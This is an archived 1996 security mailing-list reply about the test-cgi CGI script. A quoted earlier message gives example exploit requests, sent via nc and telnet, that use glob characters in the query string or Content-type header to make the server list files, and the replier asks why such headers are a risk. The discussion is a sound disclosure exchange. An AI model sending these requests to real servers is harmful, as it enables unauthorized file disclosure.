[3574] in WWW Security List Archive
Re: test-cgi
daemon@ATHENA.MIT.EDU (Steff Watkins)
Mon Nov 18 10:33:42 1996
Date: Mon, 18 Nov 1996 13:18:31 +0000 (GMT)
From: Steff Watkins <Steff.Watkins@Bristol.ac.uk>
To: www-security@ns2.rutgers.edu
In-Reply-To: <Pine.OSF.3.93.961117084403.20735B-100000@novice.uwaterloo.ca>
Errors-To: owner-www-security@ns2.rutgers.edu
On Sun, 17 Nov 1996 htorgema@novice.uwaterloo.ca wrote:
> Some versions of NCSA and Apache have corrected the QUERY_STRING line, but
> not the CONTENT_TYPE nor the CONTENT_LENGTH line, while these datas can be
> easily spoofed ( see example below ).
> In fact, the CONTENT_TYPE line is potentially more 'dangerous' than the
> QUERY_STRING line because usually, http deamons don't log this field.
>
> > Example exploit:
> >
> > machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80
>
> or:
>
> machine% telnet www.host.com 80
> GET /cgi-bin/test-cgi HTTP/1.0
> Content-type: /*
>
> <Cgi output displayed here>
Hello,
excuse my ignorance but......
What possible 'security' risk could there be in setting the CONTENT_TYPE
(or CONTENT_LENGTH) variables???
If a browser sets the content type, then the server is 'informed' of
what sort of data it can send back. If the target file is a script, then
the server will return whatever script output there is. If the target
file is of a set MIME type, then that file will be returned.
With CONTENT_LENGTH, that can either be set to be too short or too long
for the incoming data. If too short, then the incoming data is truncated.
If too long, then there would either not be enough data to fill in the
incoming buffer, or the server will pad the buffer to the correct length.
I'm sorry but I cannot see how being able to set either of these two
hand-shakes would constitute a potential security hole.
Can someone please explain?
Steff
: Steff Watkins, General Computer-type being
: University of Bristol, Clifton, Bristol, BS8 1TH, UK
:
: RFC-822 : Steff.Watkins@bris.ac.uk
: X-400 : /G=Steff/S=Watkins/O=Bristol/PRMD=UK.AC/ADMD= /C=GB/
: Phone: +44 177 9287869 (external) 3046 / 7869 (internal)
